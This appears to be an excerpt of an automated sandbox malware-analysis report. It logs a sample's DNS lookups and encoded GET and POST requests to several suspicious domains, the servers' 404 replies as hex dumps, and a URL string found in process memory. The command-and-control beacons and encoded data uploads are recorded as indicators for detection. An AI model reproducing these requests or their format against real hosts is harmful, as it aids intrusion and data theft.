Source: global traffic	HTTP traffic detected: GET /sgdd/?6vSXrZxp=n1rc2pzYlnLUqZJmqzqSU8jwiNDNG2kr4Asv9klFc/49ZVn3If5xE9SNYfvTzAEQBq2X9buCd1WXrrlhdqeZCyCtFSFHqJZS4hLcKGIJEWFKX2dKFA==&av=Zj6TS2 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.laohub10.netConnection: closeUser-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
Source: global traffic	HTTP traffic detected: GET /rq1s/?av=Zj6TS2&6vSXrZxp=8hQq9qCyJ4Zif0saVOr0qkV3vmys7vn3Uoj6jh6BmUV+5nttWKyOk55u+nexa6w5x5vVR/Acbsni3tLbmGpFlLQlu0hJqsiOw5MBYhb6NnUPB5dt5g== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.xcvbj.asiaConnection: closeUser-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
Source: global traffic	HTTP traffic detected: GET /rum2/?6vSXrZxp=xMZmeyR85UPBdQXGVprUO1LR43iXmFfPz7pkSG2xpPpRtldOsCO9Ua+kpATSmsrk0H+UwmANflnCrdxtiygB3zcAk+0XRlHo47zsG34ZF8bKKHH4pA==&av=Zj6TS2 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.soainsaat.xyzConnection: closeUser-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
Source: global traffic	HTTP traffic detected: GET /d9ku/?6vSXrZxp=oAmOaC9rLcmuYnVpEIiUFnJetHEZs2+IPEF+P87/UiJAxykznzqhXWsXbleaaytX5cXBA3Pvgu1YuM8etO94atf+kZPaCRs8iMXYlGBxwothes9BXg==&av=Zj6TS2 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.amayavp.xyzConnection: closeUser-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
Source: global traffic	HTTP traffic detected: GET /vg0z/?6vSXrZxp=75uk3ictCfC5d95jc9ErhxuZnXjbt/7lQbKW3bXizAnaAV7ibEnK2RjZpZGGD2cxunkBvA8A/q4ys0sLjHkTW6XWjcMaa2pZqz34d1+1Sa3fEZ+ULw==&av=Zj6TS2 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.vayui.topConnection: closeUser-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
Source: global traffic	HTTP traffic detected: GET /o362/?6vSXrZxp=FaNItuPk5TcZ9HdRFxGis99OVV5mBzvNwqypTl8+VCtQ49ZNgIXGwO2PY0xc/TpBxHoMd3n/rLst/5dAk+rqTlrKzSCDFFwXYzga3uqvdEw6tCWfOw==&av=Zj6TS2 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.rgenerousrs.storeConnection: closeUser-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
Source: global traffic	HTTP traffic detected: GET /jhb8/?6vSXrZxp=0R31+Vq/Nm8msngZkniPPNslS216pvARFjw5y1poIV3xx1K38BT3Oq7zCSGYp4hHlG+YTfvzleF+eXVetOmvkZEk/wC7YtB6KW2U/08aXnOShntluQ==&av=Zj6TS2 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.t91rl7.proConnection: closeUser-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile

Source: global traffic	DNS traffic detected: DNS query: www.nb-shenshi.buzz
Source: global traffic	DNS traffic detected: DNS query: www.laohub10.net
Source: global traffic	DNS traffic detected: DNS query: www.xcvbj.asia
Source: global traffic	DNS traffic detected: DNS query: www.soainsaat.xyz
Source: global traffic	DNS traffic detected: DNS query: www.amayavp.xyz
Source: global traffic	DNS traffic detected: DNS query: www.vayui.top
Source: global traffic	DNS traffic detected: DNS query: www.rgenerousrs.store
Source: global traffic	DNS traffic detected: DNS query: www.t91rl7.pro

Source: unknown

HTTP traffic detected: POST /sgdd/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-USHost: www.laohub10.netOrigin: http://www.laohub10.netReferer: http://www.laohub10.net/sgdd/Cache-Control: no-cacheContent-Length: 197Connection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 MobileData Raw: 36 76 53 58 72 5a 78 70 3d 71 33 44 38 31 64 48 54 67 48 57 32 6a 59 73 72 6b 77 50 4a 52 64 37 46 6c 50 47 57 48 6e 59 4c 39 47 34 63 70 6d 52 67 66 50 38 6f 4f 32 44 6e 4f 65 5a 41 49 76 79 58 48 2b 62 71 35 46 30 39 4f 72 32 55 78 73 7a 59 59 46 4c 2b 6d 59 51 42 56 62 2b 34 42 68 2f 42 45 78 64 77 73 34 39 68 70 55 33 41 44 31 4a 2b 41 32 56 4b 41 33 39 76 53 76 2b 44 64 2b 67 6a 59 37 72 31 4a 64 71 32 4d 6e 5a 56 4a 69 59 77 69 4f 36 65 39 69 46 77 39 50 64 70 78 6b 76 61 69 2b 6f 73 4d 4f 77 4c 66 35 37 46 62 46 45 66 38 74 77 54 55 53 32 38 76 69 32 69 35 52 7a 32 74 61 6d 2f Data Ascii: 6vSXrZxp=q3D81dHTgHW2jYsrkwPJRd7FlPGWHnYL9G4cpmRgfP8oO2DnOeZAIvyXH+bq5F09Or2UxszYYFL+mYQBVb+4Bh/BExdws49hpU3AD1J+A2VKA39vSv+Dd+gjY7r1Jdq2MnZVJiYwiO6e9iFw9Pdpxkvai+osMOwLf57FbFEf8twTUS28vi2i5Rz2tam/

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 24 Nov 2024 07:13:05 GMTContent-Type: text/html; charset=utf-8Content-Length: 2966Connection: closeVary: Accept-EncodingETag: "66cd104a-b96"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 41 72 69 61 6c 2c 0a 09 09 09 09 09 22 4e 6f 74 6f 20 53 61 6e 73 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 2c 20 22 41 70 70 6c 65 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 2c 20 22 53 65 67 6f 65 20 55 49 20 45 6d 6f 6a 69 22 2c 20 22 53 65 67 6f 65 20 55 49 20 53 79 6d 62 6f 6c 22 2c 0a 09 09 09 09 09 22 4e 6f 74 6f 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 3b 0a 09 09 09 09 74 65 78 74 2d 73 68 61 64 6f 77 3a 20 30 70 78 20 31 70 78 20 31 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 37 35 29 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 7d 0a 0a 09 09 09 68 31 20 7b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 35 65 6d 3b 0a 09 09 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 2d 30 2e 30 32 65 6d 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 33 30 70 78 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 61 6e 69 6d 61 74 65 64 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 20 31 73 3b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 66 69 6c 6c 2d 6d 6f 64 65 3a 20 62 6f 74 68 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 66 61 64 65 49 6e 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 6
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Sun, 24 Nov 2024 07:14:22 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-11-24T07:14:27.9027889Z
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 24 Nov 2024 07:14:45 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2B5689FjxHcuVXmWA34FOicsfxEV8J%2BwCFuKpVrosObE%2F4Bwko2nmqHZMwMtumXdnJ8tDsqa%2B4ctnh0pRLnyszIxxGVaPcHODdEJrs%2FY14pVlsl5pQnKyUs%2BOAB22vKsD"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e779a971eed42ee-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1592&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=735&delivery_rate=0&cwnd=209&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 24 Nov 2024 07:14:47 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=G7bFXhafSdat23BO4kabOB%2BYgPSQPnB39wCQnVpHhgysx0pM8gUkAfZz3aD2Du%2F5jU2bfQqJgEW1iCKWle35SgrBwbsNsXzdCHy642LpyG%2FfFziYuFuUa03V8TssY3bX"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e779aa7bf1141cd-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1536&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=759&delivery_rate=0&cwnd=225&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 0d 0a 36 33 0d 0a b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: f63(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 24 Nov 2024 07:14:50 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xJBwL%2FE7MdPJiZj5Fzv6WHu%2FlKg42kBQnPg%2B%2FBxVwscGd7LQSCu1R6giAiOozMr0Jg31KCASO0eKk0fpSsMgPOrbS9APGWVVL%2Bu9VITSzMrkV8EsU%2BNeuKPMBPXzoDrq"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e779ab868d04399-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1714&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1772&delivery_rate=0&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 24 Nov 2024 07:14:53 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6fbdKsZDdU%2BNFDbk%2B86iERBeQFZ2q6uNUvPLGYvNb2mbMONwB5cTZW%2FbFuZM%2FGvUDmMgTUqiulVX5XCCxP8fdfA%2BKSWqcNElgbxXii26coNW9xH%2FCYW%2BDNR0p%2Foo9K48"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e779ac91e5a1a40-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1748&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=475&delivery_rate=0&cwnd=193&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 24 Nov 2024 07:15:00 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-Encodingcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2Ivejsjobhv6doc0HZEBkbHe9qHMvgjrPwHFavykbpoguEAAWrQsGzDAHy3cx4DfN05Px0EXkgxt9hbzxRY2G%2FGEUcVK6TiXFt7mgr6pyDwkss8b6i578F2I2t7W2Zy5BGRw%2FlGJZ5A%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e779af3c8d45e62-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1731&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=759&delivery_rate=0&cwnd=148&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 66 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 4e c3 30 10 44 ef fe 8a a5 27 38 e0 4d ab 54 e2 b0 b2 44 9b 54 54 0a 25 02 e7 c0 d1 d4 0b 8e 54 e2 60 3b 04 fe 1e 25 15 52 af 33 6f 46 33 74 55 3c 6d f5 6b 5d c2 83 7e ac a0 6e 36 d5 7e 0b 8b 5b c4 7d a9 77 88 85 2e ce ce 4a 66 88 e5 61 a1 04 b9 f4 79 52 e4 d8 58 25 28 b5 e9 c4 2a cf 72 38 f8 04 3b 3f 74 96 f0 2c 0a c2 19 a2 37 6f 7f a7 dc 52 5d 30 6e a9 04 f5 4a 3b 86 c0 5f 03 c7 c4 16 9a e7 0a 46 13 a1 f3 09 de 27 0e 7c 07 c9 b5 11 22 87 6f 0e 92 b0 9f 9a 82 12 64 ac 0d 1c a3 ba ef cd d1 31 ae 64 2e d7 6b b8 6e ba f6 e7 06 5e 66 1c 4c 82 71 1c 65 f8 e0 8e 83 1f 62 88 32 26 1f 18 6a 1f 12 dc 65 84 ff 2d 82 70 9e 49 38 df fb 03 00 00 ff ff e3 02 00 db 2a cd 17 19 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: f0LN0D'8MTDTT%T`;%R3oF3tU<mk]~n6~[}w.JfayRX%(r8;?t,7oR]0nJ;_F'\|"od1d.kn^fLqeb2&je-pI80
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 24 Nov 2024 07:15:02 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-Encodingcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7XjiIe9cHNjlJXZjJNl6ZGWjlP7RSQaG758O2lPR1zKcOVpBegzdJUCikdwN353Wy9xMvSSGONY91vU4QNy46511Iuk9qMh91tpoZ%2FsvJr45C7Ba2MbKkIuZSnrGnoneKZZkZ9WZ220%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e779b045f398c65-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2049&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=783&delivery_rate=0&cwnd=190&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 65 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 4e c3 30 10 44 ef fe 8a a5 27 38 e0 4d ab 54 e2 b0 b2 44 9b 54 54 0a 25 02 e7 c0 d1 d4 0b 8e 54 e2 60 3b 04 fe 1e 25 15 52 af 33 6f 46 33 74 55 3c 6d f5 6b 5d c2 83 7e ac a0 6e 36 d5 7e 0b 8b 5b c4 7d a9 77 88 85 2e ce ce 4a 66 88 e5 61 a1 04 b9 f4 79 52 e4 d8 58 25 28 b5 e9 c4 2a cf 72 38 f8 04 3b 3f 74 96 f0 2c 0a c2 19 a2 37 6f 7f a7 dc 52 5d 30 6e a9 04 f5 4a 3b 86 c0 5f 03 c7 c4 16 9a e7 0a 46 13 a1 f3 09 de 27 0e 7c 07 c9 b5 11 22 87 6f 0e 92 b0 9f 9a 82 12 64 ac 0d 1c a3 ba ef cd d1 31 ae 64 2e d7 6b b8 6e ba f6 e7 06 5e 66 1c 4c 82 71 1c 65 f8 e0 8e 83 1f 62 88 32 26 1f 18 6a 1f 12 dc 65 84 ff 2d 82 70 9e 49 38 df fb 03 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 db 2a cd 17 19 01 00 00 0d 0a Data Ascii: e5LN0D'8MTDTT%T`;%R3oF3tU<mk]~n6~[}w.JfayRX%(r8;?t,7oR]0nJ;_F'\|"od1d.kn^fLqeb2&je-pI8b
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 24 Nov 2024 07:15:05 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-Encodingcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gXWTKEGLRqfcyBwiX4pCmTtofiGyZYeR27Mpug%2B2YB%2BxrqJ7D6o90by5dKrQQJ7bQDcRtRGr1jTXSBKZ8vDGDjFnXswCTWbrVJt32Nry6RFHmb861Srs521EEho%2BHPn51glcH6L7w9Y%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e779b14fafc431c-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1768&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1796&delivery_rate=0&cwnd=229&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 65 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 4e c3 30 10 44 ef fe 8a a5 27 38 e0 4d ab 54 e2 b0 b2 44 9b 54 54 0a 25 02 e7 c0 d1 d4 0b 8e 54 e2 60 3b 04 fe 1e 25 15 52 af 33 6f 46 33 74 55 3c 6d f5 6b 5d c2 83 7e ac a0 6e 36 d5 7e 0b 8b 5b c4 7d a9 77 88 85 2e ce ce 4a 66 88 e5 61 a1 04 b9 f4 79 52 e4 d8 58 25 28 b5 e9 c4 2a cf 72 38 f8 04 3b 3f 74 96 f0 2c 0a c2 19 a2 37 6f 7f a7 dc 52 5d 30 6e a9 04 f5 4a 3b 86 c0 5f 03 c7 c4 16 9a e7 0a 46 13 a1 f3 09 de 27 0e 7c 07 c9 b5 11 22 87 6f 0e 92 b0 9f 9a 82 12 64 ac 0d 1c a3 ba ef cd d1 31 ae 64 2e d7 6b b8 6e ba f6 e7 06 5e 66 1c 4c 82 71 1c 65 f8 e0 8e 83 1f 62 88 32 26 1f 18 6a 1f 12 dc 65 84 ff 2d 82 70 9e 49 38 df fb 03 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 db 2a cd 17 19 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: e5LN0D'8MTDTT%T`;%R3oF3tU<mk]~n6~[}w.JfayRX%(r8;?t,7oR]0nJ;_F'\|"od1d.kn^fLqeb2&je-pI8b0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 24 Nov 2024 07:15:08 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-Encodingcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2%2B7F1CKoJ2kk17r2Yumv2grFmCCdZYgFwxcj47gDc1uD78MnX0bALnJu1GnBlhxQ56XC4qbL3TZmRPcN8q%2B01N0wuG5FhDwQLmBqHFq%2B3NQgfWok%2BAkf1qFwfjwVeGjBPWgoQCeR6uA%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e779b25ee0841ff-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1725&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=483&delivery_rate=0&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 31 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 35 20 28 55 6e 69 78 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 72 67 65 6e 65 72 6f 75 73 72 73 2e 73 74 6f 72 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 31 0d 0a 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 118<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.55 (Unix) Server at www.rgenerousrs.store Port 80</address></body></html>10

Source: svchost.exe, 00000002.00000003.1587669784.000000000301A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1587772591.0000000003048000.00000004.00000020.00020000.00000000.sdmp, McqlvggSSSjC.exe, 00000004.00000002.3220941177.0000000000558000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://server/get.asp
